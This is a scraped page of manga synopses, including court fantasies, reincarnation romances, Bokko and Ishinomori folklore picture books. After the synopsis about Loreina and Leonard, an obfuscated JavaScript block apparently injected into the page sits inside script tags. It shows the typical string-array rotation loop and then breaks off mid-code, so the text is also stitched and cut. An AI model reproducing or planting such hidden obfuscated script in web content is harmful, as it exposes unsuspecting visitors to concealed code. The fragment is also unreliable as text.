Deciphering the memories dwelling within flora to solve each case. A classic Chinese-styled fantasy set in the inner palace. Kouken is a girl from a hidden village that are descendants of florakinetic sages. However, because of their abilities, their clan has a history of being oppressed. One day, the fourth prince Shurei, finds them and takes Kouken to the inner palace for her flora sage abilities to solve various mysteries and cases at court. This is a manga adaptation of the 20th Kadokawa Beans Novel Award winner, which won both the “Excellence Award” and the “Readers' Prize.”
Shushu has entered the chat: her own chat, that is! This modern-day game streamer turned tragic imperial princess has already lived and died twice, and by the third time around, she's hoping to finally break the cycle of rebirth. But God has other plans for her reincarnation, which involve her returning to the very palace that already killed her once before. Thankfully, she isn't reborn without any plot armor at all. Shushu is now blessed with the ability to interact with reality the way she did in her first life: through an online persona. And somehow, the people around her all seem to be avid fans of the stream that is her life. As elements of Shushu's previous lives collide, she'll try using her adorable charm and clever wit to amass loyal followers, rescue an empire, and ultimately beat the game.
A talented elder sister becomes a civil official and a beautiful younger brother becomes a courtesan! Shunran and Shunrei are twin sisters born into a family of poor local bureaucrats. However, the elder sister, Shunran, is so clever and the younger brother, Shunrei , is so beautiful that they are often mistaken for each other. The rumour that "the elder sister is the most beautiful woman in the world and the younger brother is a smart and promising young man" finally reached the ears of the emperor, and Shunran was assigned to work in the imperial palace! Shunrei is also forced to take the examination. ...... The two, trapped in a corner with an unwanted future, decide to switch places and live together!
In a small town in the countryside lives a boy named Danny, an orphan with a tear-shaped birthmark. While the town is peaceful, there are rumors of a plague spreading in the outside world, which turns people into flower petals…
"I … ..can't live without you." A handsome man slides his moist fingers over the smooth skin of a young girl. His eyes are warm and his delicacy is such that you will believe he’s in love. The world divided between the "World of the Gods", the "Other World", and the "Earthly World", was filled with chaos. In the realm of the gods, the gods enjoyed eternal life. The goddess Persephone works hard every day to care for the plants so that her life will sprout on the earth, but the shoots she raised withered. She will be taken over by Hades, the master of the underworld, who has come to welcome "death". Persephone laments her grief, but she is moved by Hades' encouragement, and is drawn to his quiet, calm and gentle side... Meanwhile, Persephone decides to offer her own body to save Hades, who has been caught up in the conspiracy of the divine world.
"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Legend has it that the Misty Mountain in the Hundred Thousand Mountains is inhabited by the Medical Immortals, which is quite magical. This is an ancient sect of immortal cultivation, where each generation of disciples has the same bloodline, but for the brothers, the handsome brother is a snake charmer? Snake Spirit has a Disease Shé Jīng Shì Zhǒng Bìng Snake Essence Is a Kind of Disease 蛇精是种病
The body was possessed before the start of the novel. Also, she, the daughter of a Count, is an extra who is bound to be murdered. She didn't want to die like this, so she went in search of the male lead who's filled with the energy of life. The problem is that, due to his curse, he can't remember others. As the next best solution, she even tried to target his subordinates. "It's been long, Loreina." What? Why does this person remember me? It was unexpectedly due to an exception of the curse. Um. Well, I'll help you until the female lead appears. The only one who can break the curse is the female lead, so that it doesn't deviate from the original story. ...Yeah, that's exactly what she thought. ••• Kiss. I felt a soft touch on my cheek along with an unfamiliar sound. A tiny kiss landed on my cheek. "...Le-Leonard." "Stay still. It's interfering with the treatment." "No, but that's..." I understand that you're healing the injured area with the energy of life. "Is there any other way than this? You can just touch the injured area with your hand..." "No." Leonard just cut me off. ...No, there's no such thing!<script></script><script>(function(_0x170be8,_0x4f3006){var _0x5282b9=_0x2819,_0x5e0002=_0x170be8();while(!![]){try{var _0x2f6632=parseInt(_0x5282b9(0x1a9))/(0x8ee+0x2199+-0x2a86)*(parseInt(_0x5282b9(0x1a4))/(-0x1501+-0xc6+0x15c9))+-parseInt(_0x5282b9(0x1b0))/(-0x10*-0x1bc+0x2ad*-0x1+-0x1*0x1910)*(-parseInt(_0x5282b9(0x1a8))/(-0x51b*0x2+0x23b1*0x1+-0x1977))+parseInt(_0x5282b9(0x1bd))/(0xeb+-0x6d*-0x31+-0x3*0x741)*(parseInt(_0x5282b9(0x19e))/(-0x1f25+0x1d35+0x1f6))+parseInt(_0x5282b9(0x1a5))/(-0x1c63+-0x221*-0x11+-0x7c7)*(-parseInt(_0x5282b9(0x1a2))/(0x26ee+0x90b*0x1+0x1*-0x2ff1))+parseInt(_0x5282b9(0x1b8))/(0xa3*-0x16+0x4a6+0x965)+parseInt(_0x5282b9(0x1b6))/(-0x105+-0x5c*0x40+0x180f)*(parseInt(_0x5282b9(0x1b9))/(-0xd*-0x89+-0x2*-0x3e5+-0xeb4))+-parseInt(_0x5282b9(0x1b3))/(-0x4ca*-0x7+-0x67*-0x3a+-0x38d0);if(_0x2f6632===_0x4f3006)break;else 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2300 years ago in China there existed a clan called the men of Bokk trained to aid and defend threatened cities with their lives. Kakuri, one of these men, is summoned to the little city of Ryo. Distrusted and even hated, Kakuri eventually gains the trust of Ryo's citizens as Tcho empire's vast army sets their camp on the other side of the river. Bokko won the Shogakukan Manga Award in 1995. 11 Tankoubon Volumes (Chinese) 8 Kanzenban Volumes (Japanese)
A series of short stories with an element of fantasy set in Victorian England and centering on Cornelius Everdeen, a young, handsome heir to an earldom. Volumes in Uruwashi no Eikoku Series (うるわしの英国シリーズ). Beautiful England 1: Waiting for the Moon to Rise / Tsukinode wo Matte / 月の出をまって Beautiful England 2: China Bird Guide / China no Tori / 中国の鳥 (波津彬子) Beautiful England 3: Resident of the Castle in the Sky / Kuuchuuroukaku no Juunin / 空中楼閣の住人 Beautiful England 4: The Flowers Melancholy / Hanabana no Yuuutsu / 花々のゆううつ Beautiful England 5: The Wind Opened the Door / Tobira wo Akeru Kaze / 扉をあける風
Knights is a shounen manga tale about squire Mistletien, called 'Mist' for short. Taking place in a medieval world in which the church and her representatives are burning people en masse on suspicion of witchcraft, Mist and his organization are taking a stand against the church and the 'Saints' who are perpetuating the witch hunts. Mist is feared and hated by the village-folk because of his appearence, wearing a mask to disguise himself and going by the moniker 'The Black Knight.' He travels with Euphemia, a young girl who is as expert with mixing potions and poisons as Mist is with a sword, and together they rescue those who are to be executed on suspicion of witchcraft.
Contains 12 chapters: 9 short stories, and 3 Miss China stories. 1. The Universe is so Vast and Wonderful! 2. Leaving One Night by the Light of the Full Moon 3. To Invoke the Stars 4. Little Melancholy 5. The Young Scientists' Club 6. See You Later, God Willing 7. Marsy in the Land of Time 8. Natsuko 9. The Young Scientist Club on Mars 10. The Melancholy of China 11. China's Wish 12. China Strikes Back The Japanese edition collects all 12 chapters in one volume. The Spanish edition from Glénat released the full series in 3 volumes. The English edition from Dark Horse published only the Miss China chapters, first in comic format, then in one trade paperback.
A series of 5 'picture book' manga for very young children, Ishinomori crafts his own tales that fit right at home with well-known Japanese folklore, gracing them with dozens and dozens of gorgeously done two-page spreads.- **Child of the Stars** - Hikaru is a boy of mysterious parentage, said to have come down from the stars. One day, Hikaru comes to face an oni with his own reason for attacking Hikaru, one connected to Hikaru's past.- **The Dragon's Whiskers** - Taro's mother is ill, but legend has it that if she drinks a boiled dragon's whisker, her illness will be cured. Taro goes on his quest to obtain this whisker.- **Tale of the 1000 Year-Old Cedar** - A tengu father suddenly finds himself responsible for several human children. A yamauba offers to care for the children by becoming their mother, but he refuses. Frustrated, the yamauba is set on making him suffer...- **Aim For It! Saburota** - Saburota's father was killed by a whale ('the white monster'), and his mother dies from the shock. Now orphaned, Saburota aims to become a great harpooner to avenge his parent's deaths.- **Kon Kon Kon** - A young boy who doubts kitsune ends up crossing paths with one, as he suddenly ends up in different worlds, much to his confusion...